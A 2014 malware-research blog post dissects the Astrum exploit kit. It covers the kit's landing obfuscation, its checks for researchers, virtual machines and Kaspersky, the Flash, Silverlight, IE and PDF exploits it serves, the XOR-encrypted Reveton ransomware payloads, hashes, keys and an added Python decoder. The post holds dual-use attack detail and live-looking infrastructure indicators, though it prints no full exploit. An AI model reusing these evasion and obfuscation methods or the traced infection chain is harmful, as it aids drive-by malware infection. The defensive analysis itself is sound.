2014-09-14 - Study Say Hello to Astrum EK


Say Hello to Astrum EK

Astrum EK 2014-09-06 - Real Name (not chosen)

(At a quick look at the URI pattern one may find it a little Angler-ish... but it's not)

Astrum will serve a landing only once per IP and also denies connections from Tor and (at least) Russia.



The lifetime of the landing seems a little longer than on Angler or Nuclear Pack, but where most of the time you need to fake a referer to avoid being rejected, with Astrum it's the opposite: show a referer and you'll get ignored and IP banned. Firefox, Chrome and Opera are also ignored (and I guess they are filtered out upstream anyway). A fast search suggests it has been in use since at least 2014-08-15.





Now let's take a look at the bullets and the ballistics.





CVE-2014-0515 - CVE-2013-0634 (Flash) :





These days it's the most successful vulnerability targeted by exploit kits, followed by CVE-2013-2551.





CVE-2014-0515 successful path in Astrum EK

2014-09-06





GET http://static.yarkiy-mir .org/duf5ibqshp.html

200 OK (text/html)

Piece of Astrum's Landing 2014-09-06

http://pastebin.com/Jc5k0kvi

JsBeautified : http://pastebin.com/gvjskkG2

An array of modified-Base64 strings, each XORed with a different byte and then inserted (in random order) into the JS later - the Base64 is using "A-Za-z0-9-:" instead of "A-Za-z0-9+/"



Obfuscation in use as described by EKWatcher

After deobfuscating the "div" value via the function t (using malzilla for instance) we get this : http://pastebin.com/PfAjuvPR

There are sweet pieces of code like these showing they had researchers/bots etc. in mind while writing it : on landing load, the script will try to detect debugging tools

(even phantom....)





and also checks via loadXML whether obvious researcher tools are running or whether it's running in a VM.

Check for Kaspersky BHO

And here is the data that will be posted :

Fast sum-up of the data that will be encoded and posted in the next call.

Comments are obviously not in the original code.



POST http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg..

200 OK (text/html)

CVE-2013-2551 and creation of the flash object.

Posted data (as Neutrino was doing) : http://pastebin.com/raw.php?i=GBHqpM4N

Which before encoding should look like :

Data sent to the Exploit kit on second call

Astrum - 2014-09-06

Piece of the Post Call reply. The obfuscation in use is the same as in the landing. Once decoded, here is the Flash insertion :

Astrum - Inserting the flash element.

http://pastebin.com/GYehkmaC

GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g..

200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7

CVE-2014-0515 & CVE-2013-0634 (Thanks to Arseny Levin (Spiderlabs) for the help)

GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ..

200 OK (application/octet-stream) Once decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton



Xored Payload. Key : 98EB68248A2815474CFE8902C0603770





I didn't check that deeply yet, but it seems you will get a unique Xor key for each pass.
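As an added example (not code from the post, and not the kit's own), here is a Python decoder for the two layers described above: the landing's modified Base64 (the "-:" alphabet) followed by a single-byte XOR per string, and the repeating 16-byte XOR on the downloaded payload whose MD5 can then be compared with the one given in the write-up. Assumptions, marked in the comments: the XOR is applied to the Base64-decoded bytes rather than to the text, padding is omitted, and the sample strings are constructed here, not captured from the kit.

```python
import base64
import hashlib

# Alphabet observed in the Astrum landing: "-" and ":" stand in for the
# standard "+" and "/". Translating back lets the stock decoder handle it.
_ASTRUM = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-:"
_STD = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TO_STD = bytes.maketrans(_ASTRUM, _STD)


def astrum_b64decode(text):
    """Decode one modified-Base64 string from the landing's array."""
    data = text.strip().encode("ascii").translate(_TO_STD)
    data += b"=" * (-len(data) % 4)  # assumption: "=" padding is omitted
    return base64.b64decode(data)


def decode_landing_string(text, key_byte):
    """Modified Base64, then XOR with the byte attached to that entry.

    Assumption: the XOR is applied to the decoded bytes, not to the text.
    """
    return bytes(b ^ key_byte for b in astrum_b64decode(text))


def xor_decrypt(blob, key_hex):
    """Strip the repeating 16-byte XOR layer from a downloaded payload."""
    key = bytes.fromhex(key_hex)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def decrypted_md5(blob, key_hex):
    """MD5 of the decrypted payload, to compare with the hash in the post."""
    return hashlib.md5(xor_decrypt(blob, key_hex)).hexdigest()


# Constructed sample (not from the kit): "Kaspersky" XORed with 0xB0 and
# encoded with the "-:" alphabet. Note the leading "-" where standard
# Base64 would emit "+".
SAMPLE_LANDING_STRING = "-9HDwNXCw9vJ"
SAMPLE_LANDING_KEY = 0xB0

# Constructed sample: the first four bytes of a PE header ("MZ\x90\x00")
# XORed with the key seen on the 2014-09-06 Flash pass.
SAMPLE_PAYLOAD_KEY = "98EB68248A2815474CFE8902C0603770"
SAMPLE_PAYLOAD_BLOB = bytes.fromhex("D5B1F824")

if __name__ == "__main__":
    print(decode_landing_string(SAMPLE_LANDING_STRING, SAMPLE_LANDING_KEY))
    print(xor_decrypt(SAMPLE_PAYLOAD_BLOB, SAMPLE_PAYLOAD_KEY))
    print(decrypted_md5(SAMPLE_PAYLOAD_BLOB, SAMPLE_PAYLOAD_KEY))
```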

CVE-2013-0074/3896 (Silverlight) :





Astrum EK - 2014-09-06

Silverlight Successful path









GET http://asset.yur88 .com/xawufyinv3lqr.html

200 OK (text/html)

To give an idea of the data being sent to the Exploit Kit on the following POST request (md5 is different) :

POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..



Astrum - 2014-09-06

Piece of the Post Call reply launching the Silverlight and CVE-2013-2551 attacks. The Silverlight call, once decoded :



Astrum : Post reply silverlight call once decoded

2014-09-06

http://pastebin.com/enPjFN96

200 OK (text/html)

GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA..

200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce

Silverlight Exploit e332a8d62288b80f939fff7d50ac33d3 sl.dll :

GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w..

200 OK (application/octet-stream) Once decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton again

Xor key : BFAD0475157E8E15F72903B5E80649B2

CVE-2013-2551 :





CVE-2013-2551 successfully fired by Astrum EK

2014-09-11



GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html

200 OK (text/html)



POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..

200 OK (text/html)





After a first pass of decoding :

Piece of CVE-2013-2551 after first decoding pass.

http://pastebin.com/g847kaSX



GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..

200 OK (application/octet-stream) Once decoded: a668806b4be0e3b02e3adf0130b70bd0 (Reveton)

Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6



Payload written in %temp%\tmp1.log



If the lock screen is activated you'll get, for instance in the US :

Reveton - Screen locked - 2014-09-11 US.

CVE-2014-0322 :

For some reason I couldn't get that one working properly.

CVE-2014-0322 fired by Astrum

But unsuccessful. I'll update if I get a successful pass.



GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html

200 OK (text/html)



Posted data after the landing, whispering to the server to try CVE-2014-0322 (md5 is different)



POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..

200 OK (text/html)



Obfuscated piece of code to trigger CVE-2014-0322

Astrum 2014-09-11

I won't put the decoded one ;)



Piece of the B64 encoded shellcode



CVE-2010-0188 :





Astrum firing CVE-2010-0188 (and Flash exploit also)

2014-09-11



GET http://assets.dance .com.ar/oljm3dz7pnh.html

200 OK (text/html)





Decoded posted data



POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..

200 OK (text/html)

Encoded part of the Post reply in charge of the call for CVE-2010-0188

Astrum - 2014-09-11

Once decoded :

Iframe called for CVE-2010-0188



GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..

200 OK (text/html)



Obfuscated : creation of the PDF object

Decoded :



Deobfuscated call for PDF



GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..

200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)



GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..

200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a



We have the same kind of obfuscation here as in the landing and the POST response.



Object in the PDF containing the Encoded data

Piece of js in charge of deobfuscating and triggering the exploit



GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..

200 OK (application/octet-stream)



GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..

200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton



Note that both payloads (Flash and PDF) in that pass have the same Xor key ( 919DCE47A3DBD2518B2F1088604AE0DA )





No Java ?



This exploit kit had some Java a few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465 - if you search for this IP in your logs you might figure it out) but it seems Java is not exploited anymore.

As I assumed for Flash EK, it's a trade of a now small percentage of infection for more stealth ( >> infection chain lasts longer >> less rebuild).





The exploitation Graph should be something like :



Astrum EK - Exploitation graph assumption 2014-09-14



Files :

AstrumEK_2014-09-14.zip (Owncloud)

PS: If you have some telemetry on this IP : 107.150.24.107 I would be really interested in the numbers. Seeing the infection path, I think traffic should be quite big.